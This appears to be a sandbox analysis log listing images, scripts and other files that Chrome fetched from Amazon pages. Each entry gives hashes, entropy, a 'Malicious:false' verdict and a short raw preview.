                                                                                                                                                                                                                                                                      SHA-512:6B66061F0AD05364F9612B202A2929B1C21534F13F884919E41CD0A0C2476FABA4B8268CE47D8FF0FAED7C3A166CB3C9AAE1D07A81D872732C17B162D163A315
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/L2-Top-brands-Sparnod-750x300.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,....".........................................................................^....@...........>r~{..S.~.N..................(L=............. y76.A.Z=.D...............5y%WJ.Z.g.}.[...`...........s..N..}.{R.;..p.^.;..........Wx..:.^.....LWB.;.9.@.........<'S$..le..#..Z.{\..7.........9.;..w.W7E..!...U....w[...........V.|......jo6..-..>..P...........Q..<..;.w.#B...:Z.6..........._......i.;.w..q]............O.....j....:?........<....z.k....^....S...C......k.[W8..<..s..u..c..}.MB.u+.....h.....S.H.....,4[.B.+..$..v.r+...m.z[............V.x......1.._........@.`....-.s..=....y.p=:............G.jK.2.U.&0.DY.d.M.....@...m....[.lW.)........<...|.g.Q..{..*t:.......... .........Pj.....u....I...........T%....s..n............t^.>|....T..................p.....V8.oS.. .........+....^......kg...h..............+..2.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4058
                                                                                                                                                                                                                                                                      Entropy (8bit):7.670685813872088
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:R90kUkg7u9q9VQxAsCHZou955WwkyEoH7+Mj7EE5TR:gLeq9Vg2DPqM8EL
                                                                                                                                                                                                                                                                      MD5:AD2F396F894FB5783BC9B0C129CF1E9D
                                                                                                                                                                                                                                                                      SHA1:2995D29D1633819C92370AAEBFC7099F86668B40
                                                                                                                                                                                                                                                                      SHA-256:74D21ED6150E08EDDA27FD3A4A09442A476F50F62A8050E82488DBCB172CB399
                                                                                                                                                                                                                                                                      SHA-512:CFA4CCDCDBE0C364828820F9B3D1C9C4C7D872E14E616CE595390EBA6556FB8333B2AA9840226045940EEEC1B99445DC3EFE7959EE31BD29FA983CDF55A67549
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:676F8B9C478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:676F8B9B478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="1D2D8B369F8CAF40DBD3A97E2A12B827" stRef:documentID="1D2D8B369F8CAF40DBD3A97E2A12B827"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d........................................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (596)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):145592
                                                                                                                                                                                                                                                                      Entropy (8bit):5.473202146029003
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:F2Pnv3DHGitB/3hznNbfd6OhjXT4/6zrdB:WnxfFV3rP
                                                                                                                                                                                                                                                                      MD5:E6AD7C0C1D758C62AE17AD09350846A7
                                                                                                                                                                                                                                                                      SHA1:F6DB6B79C1AA8F3D948AC71AA67C03E15803B2C3
                                                                                                                                                                                                                                                                      SHA-256:9C325CB41BAE7C9020F583FA732239F25371514F267131A80F14B9A3BB774B60
                                                                                                                                                                                                                                                                      SHA-512:55DA9C15DCB796DAFA010DE28F4372D325184AD5CC2981F91EB78C6CF1CA789D5590BD3373802212D868267A337007744B3B831685F1531F94960BA0961FBAE3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(e){var f=window.AmazonUIPageJS||window.P,k=f._namespace||f.attributeErrors,c=k?k("SearchAssets@actions",""):f;c.guardFatal?c.guardFatal(e)(c,window):c.execute(function(){e(c,window)})})(function(e,f,k){e.declare("s-actions",{SUB_RESOURCE_ITEM_READY:"s-web-application-controller:subResourceItemReady",DEBUG_VIEWS_ATF:"s-web-application-controller:debugViewsAtf",DEFERRED_CONTENT_READY:"s-web-application-controller:deferredContentReady",FILTERS_LINK_VIEW_READY:"s-web-application-controller:filtersLinkViewReady",.FILTERS_PANEL_VIEW_COMPLETE:"s-web-application-controller:filtersPanelViewComplete",FILTERS_PANEL_VIEW_READY:"s-web-application-controller:filtersPanelViewReady",LOAD_REFINEMENTS_COMPLETE:"s-web-application-controller:loadSearchRefinementsComplete",LOAD_SEARCH_PAGE:"s-web-application-controller:loadSearchResults",LOAD_SEARCH_PAGE_COMPLETE:"s-web-application-controller:loadSearchResultsComplete",LOAD_SEARCH_PAGE_STARTING:"s-web-application-controller:loadSearchPageStarting
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 122x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):5329
                                                                                                                                                                                                                                                                      Entropy (8bit):7.932952179335072
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TLdhOzgj4j4alVwMsC9k+WQnDuMdFMx9tfbOBH/5/16ChvEc8Wn:fbOh/lyMd5WQndd6x9tOH/5/16LcVn
                                                                                                                                                                                                                                                                      MD5:01F1E428C75E63DDD608DDE1A32F53B2
                                                                                                                                                                                                                                                                      SHA1:8ADDA4ACFAE73BF99BDB0C2408F841B04B134E9C
                                                                                                                                                                                                                                                                      SHA-256:27CD2A45E4ED0FC9EDA5D95B7D8F0D5ABAE3D1C4E0D6A86ED932E6CE21720596
                                                                                                                                                                                                                                                                      SHA-512:EF366FA13FF415D3806E8D18EB7717D69E1322A31BBAB036A3E78A306DD2663B2673047C6B179AF2DFB3E44F4FA031CBFB217B99CBAA7E5F09B5AE166E0435DC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........z.."................................................................!..1AQ."aq....2Rbr....#B....DSc...$%4Cs..................................................1Q!............?..u*T..q..o.YO.tH. ..,..#E....]#..b...+]....L.U..{.=....Z.{;.....]..e..e*...<. ..u]V...x...@....F@.nPnP...y......K...6..}R..L.-y..A.Jj......v...p.....?bh...i/.p....Z...|...= ..D.g.R.jL}F3..t..x...9.D.%*.B...>C.?.}a.f...7.....x.>"....q..u..8.{'-....E.X.....'..?...Z$...S.c..z.H8..7..S'.d.....k..7...^....U...L..../..u.]...&.i...h....A....\....[...`A.ZBM....2..R......-....C<...V!....8,.N=._.......[.t..=.!....9.....t..R.J....7........o.......p.W....9..>h.!%G......@....:!..N.i.....,..ML...*PJ^h. .x..\.*......4.I..qT..y.G.ky\7../_..RoS.sON ..RGY].i....8..|....:....m5.*...7..V...(7..m.zH..;(.......A.3.?Q.+]....e........>.>
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x229, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):16602
                                                                                                                                                                                                                                                                      Entropy (8bit):7.946985815408516
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:NZGXk0ln+HK/mgAN/aoZMtoBlvEBmYGxFBteCUg0CtoyEY6CWG9:NZ1in4KO/dOt6vimrPeCP0LzCx
                                                                                                                                                                                                                                                                      MD5:68A9D1CAA1C8699541C7F109E9219430
                                                                                                                                                                                                                                                                      SHA1:5B5072E8A43D16092B0D0A76E01D8650463D83B6
                                                                                                                                                                                                                                                                      SHA-256:FE334E2034CD8234D79FDB4E4D95A63DEFEC770D23571E363F87707C23BDB45D
                                                                                                                                                                                                                                                                      SHA-512:9A8132C571A04D2225FC180EB41F58F19268C94B9767DFBF678F73FD6AD62BF445D8743D306C74E7ECD434B6257A372EEF31461E78877C5BD083EE43DA3CD344
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5........................................................................................PR....I(.Z.ki.!1.U..u1.@.................O9.-.H.=.........8..uS.[:\.$u..6mx~_...e.F}..ZL#^VE.)P.............KUBeT.<.ZEo.B...K.VH+..3....B.."i].3O...R.....O.5.Y.._..N.t._......@......<z.E.......2M:.F.R...C.}.......s....{e=...s.$..3;..-%)%:...U.(.(..us.Y..J+SFJ.@.V......}5.[.b).j..+...-...RehZ....Wv..R.cn.$82]_X>.&..aU~..\i.k.G....`O.>.&x..kN.iA.....69.....V.Y.;.-JVk.5.....,.UO.e.<F5!.....[ugF...X..||eu.[..Y..R:...[X..h.A%8U.#.*,..t.W.)......v2.i.v.~..........f&.....H.8.r.].'...z..).5r.5...%."...>P.v_0sm.Q^..]*Y.~.l..I#..EI..0G:h..1..._0l-...!.,K.^Q.ca.s.....b.->.Y.....b....I^.l..jw..6Rw.YS..3.K3.. 92.....5v.Y.../h.-.Eu..)..:....)...y..7.U..0.;Y......YzT.T.....EI"p..8.a..f...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (16775), with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):16775
                                                                                                                                                                                                                                                                      Entropy (8bit):5.4319461542356375
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:75e8vl7Dm2yfRRt2XHyfO7NGSulG8QKf1OqJA3oq3Ov07r:75e8v1DSoXpGmqJA3oq3Ov07r
                                                                                                                                                                                                                                                                      MD5:909387735CDFE104DDCB4552DB93B969
                                                                                                                                                                                                                                                                      SHA1:9E9B4D86B6122C3E2B8DE8B6A2075B165DBB7682
                                                                                                                                                                                                                                                                      SHA-256:DA1947B36F0D22AEE59588CBAC8F06A015218EE7DDF6706618BE10F2A1151211
                                                                                                                                                                                                                                                                      SHA-512:0905206335158C2E99E2ABA560725A0A34F7D72F287F82924C7892AFA6558065D24BE034DBFE1FA611D877E21D8B59115F2E33C2050079D468ECD1DB94A612D1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/41zL88vnT5L.js
                                                                                                                                                                                                                                                                      Preview:var LoggingClientManager;(()=>{"use strict";var e={834:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=t.VISUAL_COMPLETENESS_LATENCY=t.UNCAUGHT_ERROR=t.CREATIVE_LOAD_LATENCY=void 0;const n="uncaughtError";t.UNCAUGHT_ERROR=n;const i="creativeLoadLatency";t.CREATIVE_LOAD_LATENCY=i;const o="visualCompletenessLatency";t.VISUAL_COMPLETENESS_LATENCY=o,t.default=class{constructor(e){if(this.events={uncaughtError:{}},this.timers={},this.onNewError=()=>{},this.window=e&&e.window||"undefined"!=typeof window&&window,!this.window||!this.window.document)throw new Error("Window and/or document is not defined");this.trackLoadLatency(),this.trackVisualCompletenessLatency(),this.addErrorListener()}trackLoadLatency(){this.timers[i]=new Date}trackVisualCompletenessLatency(){this.timers[o]=new Date}addErrorListener(){const e=this.events[n];this.addListener(this.window,"error",(t=>{let n=t.message;if(t.error&&t.error.stack){const e=t.message+" : "+t.error.stack;n=e.length<500?e:e.substri
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                      Entropy (8bit):4.017824858003425
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:kY4L4NKbvn:kY4EIn
                                                                                                                                                                                                                                                                      MD5:734930DCDBA2810CE73FE5069CC19669
                                                                                                                                                                                                                                                                      SHA1:81CAF1CBA98DBEAF1A9E7640B0B85071D099254C
                                                                                                                                                                                                                                                                      SHA-256:38956056E9E4D8C6798025989C602B9287F3B4477754CEBD04A48520E9490377
                                                                                                                                                                                                                                                                      SHA-512:DD2B4AF207BE550370A4B6E1780AF00C78BA68318F30C4DA5AF1F231B7E045DFF62CDDFD5FDA63C716A70CD6EEFE0C5C012262DA0AACD2E8E6718DECBB6C3A5E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<UnknownOperationException/>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):29265
                                                                                                                                                                                                                                                                      Entropy (8bit):7.946188922439126
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:CabFw5+EsxZH34LmuZaRejUhWohoiafSNqGWxPnf:CaA2juZQYw/aaNqPnf
                                                                                                                                                                                                                                                                      MD5:5E0F7632D346F9C989ECA9331F52C0B8
                                                                                                                                                                                                                                                                      SHA1:94CC50E274E962CD7A3F04BB3D9666D6278B8F9D
                                                                                                                                                                                                                                                                      SHA-256:79556141873686D84A68BACDA7B10A6378D1F449972C947AC5A4C652E765B2BD
                                                                                                                                                                                                                                                                      SHA-512:90F51C10E241245251683A859EEE6EE36EC00EF36E52F89E5301B76201379F46E46635C7E1E1A6C7DA5C6DAF1F2C9AF9E270AF1E2829ADBAA963683704C6A5E3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_Gold/xcm_banners_mena_440x300_coop_4col_phl_beachessentials_440x300_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C.......................................................................,...."...........................................>..............................!.1."AQ..2q#Ba..$...%3R...'s....................................>..........................!..1"A..Qa.2#3Bq...$Rb......r.4C..............?..c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..Ut.!.YB$.{.:......{......B..O<...ss4V..F..<.$0....$....q..Y.T.X.7^.X.PI'@.I$....O.+...F.<..$......?i...%. .OuQ0....^!.. P........ `...,..f.|...V.F..C..Y#......H...~#.$..c^E.r."T...m.Q...#.,1aI'.-.T...Y..W.h.>..J......d5 @{...?.@D~.}.....=TP..j..........G.T..........Xm..E..US.D..eR.l_....=6.#.......;.....UU.P.x.*,..8.v.GYC.%...G..DK.r............D...-...Z..g..v>.t.G{....K..p...4g.......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (595)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):52976
                                                                                                                                                                                                                                                                      Entropy (8bit):5.315043781142496
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:/OwplOVh9aGPNItQPtazaikxMXXPB+YQycmcUOzheEfbTAYfnrIulbsksLZHU:Y9kXcmmzhe4vJrPsks6
                                                                                                                                                                                                                                                                      MD5:08ADE75238D50BE6B835CB9EB47F77BE
                                                                                                                                                                                                                                                                      SHA1:1283D0AD3A738552036F4AC495484DAB0E4F7C24
                                                                                                                                                                                                                                                                      SHA-256:D6F8F9D8EEF0165B139120551326140D8693B6309A64E55FC40DE19BE21C614B
                                                                                                                                                                                                                                                                      SHA-512:10790BEA14F378A0722FD5D6CF5683C45A3F5DE253CB1BC25126A96BE70D5D83E7BF9029CB974C7F8B8C10A4FA537A3A09B9A5DB97CD69E9A937EFF271F841D6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(V){var f=window.AmazonUIPageJS||window.P,M=f._namespace||f.attributeErrors,a=M?M("CardJsRuntimeBuzzCopyBuild",""):f;a.guardFatal?a.guardFatal(V)(a,window):a.execute(function(){V(a,window)})})(function(V,f,M){mix_d("@c/api-lock",["exports"],function(a){var c={},d=function(a){delete c[a.type]};a["default"]={isLockedFor:function(a){return!a.every(function(a){return!!c[a]})},unlockForEvent:function(a,b){c[a.type]=a;try{var e=b();if(e instanceof Promise)return e.finally?e.finally(function(){return d(a)}):.e.then(function(){return d(a)},function(b){d(a);throw b;});d(a)}catch(k){throw d(a),k;}return Promise.resolve()},unlockForEventOnce:function(a){c[a.type]=a},resetLocks:function(){Object.keys(c).forEach(function(a){return d(c[a])})}};a.initialize=function(a,b,c){};Object.defineProperty(a,"__esModule",{value:!0})});mix_d("@c/aui-untrusted-ajax",["exports","tslib","@p/a-ajax","@c/guard"],function(a,c,d,e){function b(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}fun
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 141x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):11599
                                                                                                                                                                                                                                                                      Entropy (8bit):7.967413309473415
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Sr4vUhG+D4wLi1I+RDk5D/AFukEYllZP4p3Nb7GOZZHSh3a9vL4QdozM1xEJWbW/:25hGS4wRMUzCgtGOzyh3auDzM1xEiW/
                                                                                                                                                                                                                                                                      MD5:49090B94803AB6E687F8362F34140240
                                                                                                                                                                                                                                                                      SHA1:E99F86063737614375AFAB52F07540EC2E209E0B
                                                                                                                                                                                                                                                                      SHA-256:D1EF0B8D4DFC54202DC385FDD3DD6D64408A2F894AFC44928BBD50B8FD41E48E
                                                                                                                                                                                                                                                                      SHA-512:B29FED27AC1483C0030D66441E0DEBB29DD5E2F172A321EE72BC54526D90DD2683ACB867B7496EA8BB8B0F4C74116C60C61D5D5E9D7340EC502B6287BD0090C1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71OCfsKG5nL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!.1."A.#Q.2B...3Uaqr......6RTu......$Sb..%Dcs&Cd....................................................!1..."2AQaq....#4......3Bb.............?.....L.fUY.G9....x.<..._..<a.YY.)().Y.*...IM[.=.~.}..|~u.Q>{..:.9..5._.y...4rp...-.Fo.)*....8(.l.....J|.]...p1.#8.../....>.A q'.z.\5z.l.l.+*.$N......8]...p1.3......U.*a.g^K."H.o.......t..a\..%..?.J....k.......t.O...g..=......5....e..\E.si..].Mg..G.:..UQ..T....-.L.N.....$).._..;.'U.L....y..u.k=\..=Z57......5.N........[...N.Y..Gd.b.....eh.G..Z<..5.G.f.T.T"...7.)._......G.K.............c....L.O6...djvk...WV....F .LX.R..L*.!a%.....W..Cf..9..p.W.KD.x3W9..s.D.N]...UV...J......3E.jXC.w...........W...=...."&F.1.%.."..$h.....07.x.4..L.G.(x..bz....!.H.C.....!m.....F...T+..Ub.YX..lxo.....<...x.-kR.FeOq5
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 91x90, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3430
                                                                                                                                                                                                                                                                      Entropy (8bit):7.931181702362248
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:8zKRIga0QJWzRsngQ1B1JKa+3mGEi+cQ7vxtObD7YTWY/:KKIga038g2Bmj0co3mYTWY
                                                                                                                                                                                                                                                                      MD5:7BD6FA6477B8454187FAD21616D7A49E
                                                                                                                                                                                                                                                                      SHA1:33BDD312A672D06E77308041B180BC722398B5D5
                                                                                                                                                                                                                                                                      SHA-256:352B9AAE4465FF482F851DDF1D18AAD7487306E0FCAAF4A4A23510D905DC2B94
                                                                                                                                                                                                                                                                      SHA-512:8D71D9DE7041CF10E6A841CC008D9B56C3282FD9CA6A83E3AEC92F8CC33A78F4F0558F752C516B22BEE5EA3DEB737D9BB661A07139ECF0FF53B5092888A04FCD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81BY-cAOlCL._AC_QL95_SX728_SY90_FMwebp_.jpg
                                                                                                                                                                                                                                                                      Preview:RIFF^...WEBPVP8 R....6...*[.Z.>...A..j...8.0..]W......c.yV.).c.5.....o..........p..i.;......O.M.......,.....=y.............d...I.O......>N./........!.....w.g.ng...'....\..~.zN.O.............).#...'.o....b?.|u...;.......~y.K.Y.....7.........)...w....b..fia.h...c6rt.6..........~.F.s....x.H.g.0..n6B.$......*.V."....1.....fG..!/.{.....gp.p....8...8.B...2...N....{.G.....}s..t..!.&_...z.."....V......R...-.^{$..?.r...n.......5....P.z.C..:x........-...A"...!..1^.hs!w.......p|.?..L...Ua..........f....2Tql...+.m.B.iT..C...^.o.cnT.z...mP..b\.5D.|...".>?.~...).y......R.K........C........J.s.p...{......e..[.....i....=]iO.F....{.._..^C.......I$...O.h...Z..S.x..]...../......(g..%..lP..NA.B.hGN`q....e.{..CS....n.(....@G.b...9.m.....0b..I.(}...B....?....Tm...xW..."M.(E.......+..~1....cA6.3..T.*N..........n......a...I..p.@..Y.K...].;....S.ch.....i[....:$.bv|.(...p....t.=.;.J...g}......i,.o..C.2".!_ iJ......H..9........R.X...k.(G.X.-..vE./.O*.>.....\..i...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4007
                                                                                                                                                                                                                                                                      Entropy (8bit):7.7066860726202355
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TcmjeyO3rr4AcnlttNddyLTo8EyiADK3MFLU5RW9Spn:Yz3Y1ttNdd6lEyiA5FsW0n
                                                                                                                                                                                                                                                                      MD5:00C0EAAFB9B82AD7BF3A5E8970212E29
                                                                                                                                                                                                                                                                      SHA1:380BF5F45C76304D221317987F200721FBDA4224
                                                                                                                                                                                                                                                                      SHA-256:02B5402962A1C095A63D322B47EFE27A6376883D5233ACF097A0E3806AFE6FE3
                                                                                                                                                                                                                                                                      SHA-512:56B42847C0DA6978429C8B9A90B5C4C4AE8F3145777FB639B7498C9307948E87B79F6E36CFAAC1B34C2EB4D6A8A09B2BCF9B4D65063E049814C3DFB3B430F79D
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/31eMENCjajL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3.......................................................................................................h.8*...3./.+././.'.3...6.........].I..K1.J...i....].~.gi...3....I.w....{K`j?...#....z...S.....>../I....\]R\...W..,'.O,g.O[9..%..u.XXWXIa>..e.yf%_...z..Z.[rzF .......6...}t........[9...ca]a.3..%a...e:.....AmSo.."...,nim=..m|.....)..%..m..XWX.6..1a:.....(..U.-n.....@....d;.V|>~..}m.>.....[+.......'.....Xp.?zk...)...H....u....FO....]..ZD1...um...j=.]e...e...CY..'[uee....a_n&y.z....^...WJk^F.......SD{..L?..:.f?4....4..............................................-.............................0123..#!"4p@AB...............'"WNol..o...#~G.G.G.G.G.G.g.f.7....^8.%.(.... .Y......uR....u.9.Q]..zw&i..S9....jg53...H.s29...9.s....3.g0.{.W.;?.-HB..!.B....b.P.........-hB..!.B...S....>.W.;/.Z.!.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 63x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):6608
                                                                                                                                                                                                                                                                      Entropy (8bit):7.939964373966567
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:7p3o/7A5PJHoZw/JzFeFkPj8MjAAWGVodTx:7+ExHB1QFkbpsOVQTx
                                                                                                                                                                                                                                                                      MD5:5F648AEE3ABD5E98AFC0D1505B27493E
                                                                                                                                                                                                                                                                      SHA1:F23A61F3632599A8BD2F34E9C59293C38201AA82
                                                                                                                                                                                                                                                                      SHA-256:4D5907328F2D69FB295A9BA058DDA862683DAFA4031B4E40C85E99DAECC9FDC8
                                                                                                                                                                                                                                                                      SHA-512:A9D651671B39743993465C12B5497BEE72B14464DBD24890503FAE4548256CEE325394FF8F9645B44C0ACF4142899117B75D04AEB805D992FB8384E1AF0F7308
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/614eD8BhoUL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........?.."................................................................."!1A..#2Qq..a$B..Cc..................................................1..!Aq"#a...3..............?....M..*..N...U.....Y..r$...+0WS.@.N.u....H.._...u.U.`..c.d.!=+NkM..U.n...I.p!..|YO.).a.d.kb.OW.6..r^i.@./t....3..B..Vn..S....Y..)N.X .u.P....D!..[t..4.b..,.pD-.A".p.9|.3N\..A.........|r..s...N....9..h.......:.'.;oNh.@..!d.f...p......[_..B.SP..6.?./.b.Yich......=.B_]..,.1.N2Id..b...g(..... ....:W.j}.+.#:.).W......o.2N...>.muY.0..^dk~h.$....O....j...{3.4...y......'.W`.Tp..!.e~..s.,.....E_s.o.%.^Ls......E.._r>5.Z.......Y....E.........O...6...7.m.(.R.H.YI.p...D..Y...)2..h..}T.w*;.I.....\...;...@...T?...B...n".....2..L.c.....!..#..._S.|..3w..#5YL.....32c...Nh.gn.... ..U..<.G.G.D.c.....C.......f)^y...2...vq$.,.@.b.b.Gu....HD&8w..%...t..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
